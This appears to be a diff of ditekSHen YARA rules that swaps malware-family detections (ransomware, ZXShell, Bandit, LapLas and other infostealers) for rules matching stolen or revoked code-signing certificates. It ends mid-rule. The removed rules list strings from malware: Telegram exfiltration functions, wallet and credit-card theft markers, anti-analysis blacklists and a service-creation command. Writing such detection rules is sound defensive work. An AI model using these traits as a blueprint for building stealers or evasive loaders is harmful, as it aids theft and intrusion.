+rule DITEKSHEN_INDICATOR_KB_CERT_56Fff139Df5Ae7E788E5D72196Dd563A : FILE
 {
 	meta:
-		description = "Detects Lockdown / cantopen ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "793df99d-016a-5f96-9ff9-76d3f08e0dd2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7cdca79f-5bf3-5768-b034-4d3bb177ffc9"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9463-L9476"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3919-L3930"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a9bc2f514730703f3edf78a61f1bc357eee12b3289fc7491197c3b885286ca7e"
+		logic_hash = "022fd24ba023dba06f1c63d1d1c90d17dc82b060d634a27b237d37e37455964f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "BgIAAACkAABSU0E" wide
-		$s2 = ".cantopen" fullword wide
-		$s3 = "\\HELP_DECRYPT_YOUR_FILES.txt" wide
-		$s4 = "SALT" fullword wide
-		$s5 = "$4e677664-9a63-458e-a365-deb792509557" fullword ascii
-		$s6 = "CreateEncryptor" fullword ascii
+		thumbprint = "0f69ccb73a6b98f548d00f0b740b6e42907efaad"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" )
 }
-rule DITEKSHEN_MALWARE_Win_Unamedstealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_03D433Fdc2469E9Fd878C80Bc0545147 : FILE
 {
 	meta:
-		description = "Detects unknown infostealer. Observed as 2nd stage and injects into .NET AppLaunch.exe"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cb3d575b-3d53-5b89-abc1-3b3857ec9f46"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4f793397-2768-5b34-a9f5-9100dccfa80e"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9478-L9494"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3932-L3943"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "84f4ac7489a0d522763f69ce55f816642a8511dc4b9698ce47c983020a2b7bea"
+		logic_hash = "fde125138ade8ab1a61544b90160f2c1d4bba3a09ffcf828768f98d925ab91c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "HideMelt" fullword ascii
-		$s2 = ".Implant" ascii
-		$s3 = "SetUseragent" fullword ascii
-		$s4 = "SendReport" fullword ascii
-		$s5 = "cookiesList" fullword ascii
-		$s6 = "WriteAppsList" fullword ascii
-		$s7 = "Timeout /T 2 /Nobreak" fullword wide
-		$s8 = "Directory not exists" wide
-		$s9 = "### {0} ### ({1})" wide
+		thumbprint = "64e90267e6359060a8669aebb94911e92bd0c5f3"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEC\\xA3\\xBC\\xEC\\x8B\\x9D\\xED\\x9A\\x8C\\xEC\\x82\\xAC \\xEC\\x97\\x98\\xEB\\xA6\\xAC\\xEC\\x8B\\x9C\\xEC\\x98\\xA8\\xEB\\x9E\\xA9" and pe.signatures [ i ] . serial == "03:d4:33:fd:c2:46:9e:9f:d8:78:c8:0b:c0:54:51:47" )
 }
 
-rule DITEKSHEN_MALWARE_Win_Zxshell_Loader : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Be3F393D1Ef0272Aed0E2319C1B5Dd0 : FILE
 {
 	meta:
-		description = "Detects ZXShell kernel driver loader"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c55c718b-6af3-5d3b-aa1c-369319fca603"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2be05341-c7a2-58fd-9211-8d3a912a7d5c"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9496-L9544"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3945-L3956"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b20350af231e0c329423c71d8f099305ed447d2ffcb7a533b7531dc9f5357b93"
+		logic_hash = "a7ff863b07d5ce011bdbcf86a3f562e8201926c138848544559bd1d16597ff95"
 		score = 75
-		quality = 57
+		quality = 75
 		tags = "FILE"
-		hash1 = "a6020794bd6749e0765966cd65ca6d5511581f47cc2b38e41cb1e7fddaa0b221"
-
-	strings:
-		$s1 = "KillAvpProcess" ascii wide nocase
-		$s2 = "ProtectDllFile" ascii wide nocase
-		$s3 = "LoadSys" ascii wide nocase
-		$s4 = "CallDriver" ascii wide nocase
-		$s5 = "DoRVA" fullword ascii wide
-		$s6 = "TdiProxy" ascii
-		$s7 = "res.ini" fullword ascii
-		$s8 = "res.dat" fullword ascii
-		$s9 = "google64.p" fullword ascii
-		$s10 = "google32.p" fullword ascii
-		$s11 = "OneSelfKey" fullword ascii
-		$x1 = "antiscan" ascii
-		$x2 = "removeprocessnotify" ascii
-		$x3 = "setprocessnotify" ascii
-		$x4 = "antiantigp" ascii
-		$x5 = "hideproc" ascii
-		$x6 = "hidekey" ascii
-		$x7 = "hidefile" ascii
-		$x8 = "sc create %s binpath= \"%%SystemRoot%%\\System32\\svchost.exe -k %s\" type= share start= auto" fullword ascii
-		$m1 = "St4rtServ1ce" ascii
-		$m2 = "ch3ck dr1ver failed" ascii
-		$m3 = "L0ad dr1ver failed" ascii
-		$m4 = "Write Dr1ver Failed" ascii
-		$m5 = "over writed succ3ssfully" ascii
-		$m6 = "can k1ll the pr0cessId" ascii
+		thumbprint = "7745253a3f65311b84d8f64b74f249364d29e765"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $m* ) or 5 of ( $s* ) or 5 of ( $x* ) or ( 3 of ( $s* ) and 3 of ( $x* ) ) or ( 2 of ( $s* ) and 1 of ( $x* ) and 1 of ( $m* ) ) or ( pe.exports ( "KillAvpProcess" ) and pe.exports ( "ProtectDllFile" ) and pe.exports ( "LoadSys" ) ) or ( 3 of them and ( pe.exports ( "KillAvpProcess" ) or pe.exports ( "ProtectDllFile" ) or pe.exports ( "LoadSys" ) or pe.exports ( "CallDriver" ) or pe.exports ( "DoRVA" ) ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Invincea, Inc." and pe.signatures [ i ] . serial == "0b:e3:f3:93:d1:ef:02:72:ae:d0:e2:31:9c:1b:5d:d0" )
 }
-rule DITEKSHEN_MALWARE_Win_Bandit : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_65628C146Ace93037Fc58659F14Bd35F : FILE
 {
 	meta:
-		description = "Detects Bandit Infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "06866232-bd40-5bbc-9f08-3892193b5f36"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "9104836a-3385-5b78-9e1d-705b7ed4b721"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9546-L9582"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3958-L3969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e557f5a928b5da90f3ec878d6d8615a2d8b5f33e97954cd3278044f76b543386"
+		logic_hash = "a6b4cc307d6e6f4d5d275ef0765a7082216b1d277c9b1328abe7cb2c2497e411"
 		score = 75
-		quality = 32
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "@Banditshopbot" ascii
-		$x2 = "BANDIT STEALER" ascii
-		$x3 = "Banditstealer" ascii
-		$n1 = "bandit/browsers." ascii
-		$n2 = "bandit/crypto." ascii
-		$n3 = "bandit/decrypt." ascii
-		$n4 = "bandit/messenger." ascii
-		$n5 = "bandit/userdata." ascii
-		$n6 = "bandit/utils." ascii
-		$f1 = "main.sendZipToTelegram" fullword ascii
-		$f2 = "main.killProcessHoldingFileHandle" fullword ascii
-		$f3 = "main.killProcessByName" fullword ascii
-		$f4 = "main.killProcessesHoldingFile" fullword ascii
-		$f5 = "main.deleteDir" fullword ascii
-		$f6 = "main.deleteUserDataDirs" fullword ascii
-		$path = /bandit\/(browsers|common|crypto|messenger|userdata|utils)\/(browsers|common|crypto|messenger|userdata|utils)\.go/ ascii
-		$m1 = "banditbot" ascii wide nocase
-		$m2 = "blackListedIPS = [" ascii wide nocase
-		$m3 = "blackListedPCNames = [" ascii wide nocase
-		$m4 = "blackListedMacs = [" ascii wide nocase
-		$m5 = "blacklisted_hwids = [" ascii wide nocase
-		$m6 = "blacklisted_users = [" ascii wide nocase
-		$m7 = "blacklisted_processes = [" ascii wide nocase
-		$s1 = "User-AgentVirtualBox" ascii
-		$s2 = "%s%sBinanceChainWallet" ascii
-		$s3 = "coinbaseWalletcontent-lengthdata" ascii
-		$s4 = "coinbaseWalletExtensioncommand" ascii
-		$s5 = "\\s+pid:\\s+(\\d+)\\s+" ascii
-		$s6 = "/user:Administrator" ascii
+		thumbprint = "b59165451be46b8d72d09191d0961c755d0107c8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 4 of ( $n* ) or 5 of ( $f* ) or ( $path and ( 1 of ( $n* ) or 1 of ( $f* ) ) ) or ( 1 of ( $x* ) and ( 1 of ( $n* ) or 1 of ( $f2* ) ) ) or 6 of ( $m* ) or ( all of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESET, spol. s r.o." and pe.signatures [ i ] . serial == "65:62:8c:14:6a:ce:93:03:7f:c5:86:59:f1:4b:d3:5f" )
 }
-rule DITEKSHEN_MALWARE_Win_Laplas : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_0084817E07288A5025B9435570E7Fec1D3 : FILE
 {
 	meta:
-		description = "Detects LapLas Infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bf2b0183-2b21-535a-896c-250fa448d090"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "31528b27-4a0c-5e97-b201-07e89248196a"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9584-L9612"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3971-L3982"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4a1f39a539782118db9c4ab89d03e359420397ef970165389cc79e7ea0952b3"
+		logic_hash = "89da849911c6d6a3b6d45166bd9975828887b50ee149dea4cbae9cc5c0ecf6d2"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav_sig1 = "MALWARE.Win.LapLas-DotNET"
-		clamav_sig2 = "MALWARE.Win.LapLas-GoLang"
-
-	strings:
-		$c1 = "/bot/" ascii
-		$c2 = "key=" ascii
-		$f1 = "main.isRunning" fullword ascii
-		$f2 = "main.writePid" fullword ascii
-		$f3 = "main.isStartupEnabled" fullword ascii
-		$f4 = "main.enableStartup" fullword ascii
-		$f5 = "main.waitOpenClipboard" fullword ascii
-		$f6 = "main.clipboardWrite" fullword ascii
-		$f7 = "main.setOnline" fullword ascii
-		$f8 = "main.getRegex" fullword ascii
-		$v2_1 = "{0}/bot/{1}?{2}" wide
-		$v2_2 = /\{0\}\\\{1\}\.(exe|pid)/ wide
-		$v2_3 = "schtasks /create /tn" wide
-		$v2_4 = "SetOnline" fullword ascii
-		$v2_5 = "IsAutoRunInstance" fullword ascii
-		$v2_6 = "GetNewAddress" fullword ascii
-		$v2_7 = "RefreshRegex" fullword ascii
+		thumbprint = "f22e8c59b7769e4a9ade54aee8aaf8404a7feaa7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $c* ) and 5 of ( $f* ) ) or ( 1 of ( $c* ) and 7 of ( $f* ) ) or ( 6 of ( $v2* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE6\\x8F\\x90\\xD0\\xAD\\xD0\\xAD\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xD0\\xAD\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\x89\\xBE\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xD0\\xAD\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:84:81:7e:07:28:8a:50:25:b9:43:55:70:e7:fe:c1:d3" )
 }
-rule DITEKSHEN_MALWARE_Win_Mystic : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_4D26Bab89Fcf7Ff9Fa4Dc4847E563563 : FILE
 {
 	meta:
-		description = "Hunt for Mystic Infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "959eceab-0a2c-5361-b8f4-6739033ffae5"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "168281bf-35ad-542a-adb4-20d719e31e2d"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9614-L9628"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3984-L3995"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "26e0b85141df818d70124c0b19b5b6a05ac24ae679724d7a8ad94415a6462d17"
+		logic_hash = "3eadf6eda2819101a370688d636250085915be3ebf1b3dec7a86d12a6a5ce681"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "LaStFiLe:)" ascii wide
-		$s2 = "LaStPrOcEsS:)" ascii wide
-		$s3 = "credit_cards" ascii wide
-		$s4 = "number_of_processors" ascii wide
-		$s5 = "computername" ascii wide
-		$p1 = "G:\\Projects\\Python\\morpher\\" ascii wide
-		$p2 = /G:\\Projects\\stealer\\.{15}\\Release\\.{5,25}\.pdb/ ascii wide
+		thumbprint = "2be34a7a39df38f66d5550dcfa01850c8f165c81"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 1 of ( $p* ) and 3 of ( $s* ) ) ) ) or ( all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "qvarn pty ltd" and pe.signatures [ i ] . serial == "4d:26:ba:b8:9f:cf:7f:f9:fa:4d:c4:84:7e:56:35:63" )
 }
-rule DITEKSHEN_MALWARE_Linux_Buhti : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D9D419C9095A79B1F764297Addb935Da : FILE
 {
 	meta:
-		description = "Detects Buhti Ransomware"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a50b8c34-e9e2-5466-80a1-b0ab805c68be"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7c45a78c-2cde-5200-81fd-239effef7fe6"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9630-L9643"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3997-L4008"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1bab3202dbeaf088b233c3ab1056c357d156b7eef3111bea997b1c610a27f561"
+		logic_hash = "dd35b48752eec01e1bfff182410da9a857735e0052e9c1a0d7c366dbee808d3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$x1 = "buhtiRansom" ascii
-		$x2 = "://satoshidisk.com/pay/" ascii
-		$s1 = "main.encrypt_file" fullword ascii
-		$s2 = "/path/to/be/encrypted" ascii
-		$s3 = "Restore-My-Files.txt" ascii
-		$s4 = ".buhti390625" ascii
+		thumbprint = "7d45ec21c0d6fd0eb84e4271655eb0e005949614"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x457f and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of them )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Nova soft" and pe.signatures [ i ] . serial == "00:d9:d4:19:c9:09:5a:79:b1:f7:64:29:7a:dd:b9:35:da" )
 }
-rule DITEKSHEN_MALWARE_Win_Commonmagic : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_02E44D7D1D38Ae223B27A02Bacd79B53 : FILE
 {
 	meta:
-		description = "Detects CommonMagic and Modules"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cbebe334-9b66-5931-8f92-25d080f7fd6a"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7f2ad143-c46b-58cb-9fe5-c7bb9c6d9234"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9645-L9660"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4010-L4021"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e94ba53f31f3effe12b1fbaca19fea59c0e12f742f6fc0af2a0a679bf4299cbe"
+		logic_hash = "7ab506b2e4a716bc6f7115a071f46df4ea4ac88a4b636506a13ac0d383664e58"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$p1 = "\\\\.\\pipe\\PipeMd" wide
-		$p2 = "\\\\.\\pipe\\PipeCrDtMd" wide
-		$p3 = "\\\\.\\pipe\\PipeDtMd" wide
-		$s1 = "graph.microsoft.com" fullword wide
-		$s2 = "CreateNamedPipe" ascii
-		$s3 = "\\CommonCommand\\" wide
-		$ua1 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" wide
-		$ua2 = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10136" wide
+		thumbprint = "34e0ecae125302d5b1c4a7412dbf17bdc1b59f04"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $p* ) and 1 of ( $s* ) ) or ( 1 of ( $ua* ) and 1 of ( $s* ) and 1 of ( $p* ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "02:e4:4d:7d:1d:38:ae:22:3b:27:a0:2b:ac:d7:9b:53" )
 }
-rule DITEKSHEN_MALWARE_Win_Greetingghoul : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_041868Dd49840Ff44F8E3D3070568350 : FILE
 {
 	meta:
-		description = "Detects GreetingGhoul Cryptocurrency Infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "42791b26-1cda-5bf3-b955-9de2dda1d63b"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "2cfbae1f-9c8a-5263-b9d6-5be27fdca822"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9662-L9679"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4023-L4034"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a2635066df031ba6e291c3ba14f9ed85bf3247c82c66eb1b3d3618fdebb47a6"
+		logic_hash = "80abb596d96cb388bf3ff23598fc889d4c14cccf262d01f10a5be3a738a4907e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$s1 = "peer_list" fullword ascii
-		$s2 = "seed_hash" fullword ascii
-		$s3 = "pool_id" fullword ascii
-		$s4 = "%smutex=%s:%lu" ascii
-		$s5 = "miner.cfg" fullword ascii
-		$s6 = "{\"method\": \"%s\"%s}" ascii
-		$s7 = "/app/manager/%s" ascii
-		$s8 = "X-VNC-STATUS" fullword ascii
-		$s9 = "%s\\%lu.zip" fullword ascii
-		$s10 = "\\??\\%programdata%\\" wide
+		thumbprint = "e104f236e3ee7d21a0ea8053fe8fc5c412784079"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Zhuhai Kingsoft Office Software Co., Ltd." and pe.signatures [ i ] . serial == "04:18:68:dd:49:84:0f:f4:4f:8e:3d:30:70:56:83:50" )
 }
-rule DITEKSHEN_MALWARE_Win_Multi_Family_Infostealer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C501B7176B29A3Cb737361Cf85414874 : FILE
 {
 	meta:
-		description = "Detects Prynt, WorldWind, DarkEye, Stealerium and ToxicEye / TelegramRAT infostealers"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "960830ba-df0d-539d-be2a-7778229f79bd"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "8bebf02c-de14-5488-8720-5fc98b0799bd"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9681-L9703"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4036-L4047"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0fdd1cdc4f2e5bee6c763e6e6b2e79d85285e44e2b5e3168a56d7d360252ee99"
+		logic_hash = "f3eb67b39e0e4e12388f17d231fadfc2ea36b1568191a411950c2e24c32ed09c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-
-	strings:
-		$n1 = /Prynt|WorldWind|DarkEye(\s)?Stealer/ ascii wide
-		$n2 = "Stealerium" ascii wide
-		$x1 = "@FlatLineStealer" ascii wide
-		$x2 = "@CashOutGangTalk" ascii wide
-		$x3 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
-		$x4 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
-		$s1 = "Timeout /T 2 /Nobreak" fullword wide
-		$s2 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
-		$s3 = "Downloading file: \"{file}\"" wide
-		$s4 = "/bot{0}/getUpdates?offset={1}" wide
-		$s5 = "send command to bot!" wide
-		$s6 = " *Keylogger " fullword wide
-		$s7 = "*Stealer" wide
-		$s8 = "Bot connected" wide
-		$s9 = "### {0} ### ({1})" wide
+		thumbprint = "0788801185a6bf70b805c2b97a7c6ce66cfbb38d"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8B\\x92\\xE8\\x89\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE8\\xB4\\x9D\\xE8\\xAF\\xB6\\xE8\\xAF\\xB6\\xE8\\xB4\\x9D\\xE5\\x90\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE5\\x8B\\x92\\xE8\\xB4\\x9D\\xE5\\xBC\\x97\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\xAF\\xB6\\xE8\\x89\\xBE\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE8\\x89\\xBE\\xE5\\xBC\\x97\\xE5\\xBC\\x97" and pe.signatures [ i ] . serial == "c5:01:b7:17:6b:29:a3:cb:73:73:61:cf:85:41:48:74" )
 }
-rule DITEKSHEN_MALWARE_Win_Darkeye : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_234Bf4Ef892Df307373638014B35Ab37 : FILE
 {
 	meta:
-		description = "Detects DarkEye infostealer"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5296fe28-b54e-5d0f-aa2f-2050db585d82"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "af403af3-2c10-5742-80f2-c507695106a2"
+		date = "2024-10-04"
+		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9751-L9770"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L4049-L4060"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5496dcbfe075a4030a446027765186e9dd1931561a29a481139281e1708ce87d"
+		logic_hash = "d01dbb798b309927e666e5e68c56c6eeabad7ccbc427d62f0507597c6e9e7aa7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$c1 = /Prynt(\s)?Stealer/ ascii wide
-		$c2 = /WorldWind(\s)?Stealer/ ascii wide
-		$c3 = "ToxicEye" ascii wide
-		$x2 = "@FlatLineStealer" ascii wide
-		$x3 = "@CashOutGangTalk" ascii wide
-		$s1 = "--- Clipper" wide
-		$s2 = "Downloading file: \"{file}\"" wide
-		$s3 = "/bot{0}/getUpdates?offset={1}" wide
-		$s4 = "send command to bot!" wide
-		$s5 = " *Keylogger " fullword wide
-		$s6 = "*Stealer" wide
-		$s7 = "Bot connected" wide
+		thumbprint = "348f7e395c77e29c1e17ef9d9bd24481657c7ae7"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and not any of ( $c* ) and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "23:4b:f4:ef:89:2d:f3:07:37:36:38:01:4b:35:ab:37" )
 }
-rule DITEKSHEN_MALWARE_Win_Invalidprinter : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_C650Ae531100A91389A7F030228B3095 : FILE
 {
 	meta:
-		description = "Invalid Printer (in2al5d p3in4er) Loader"
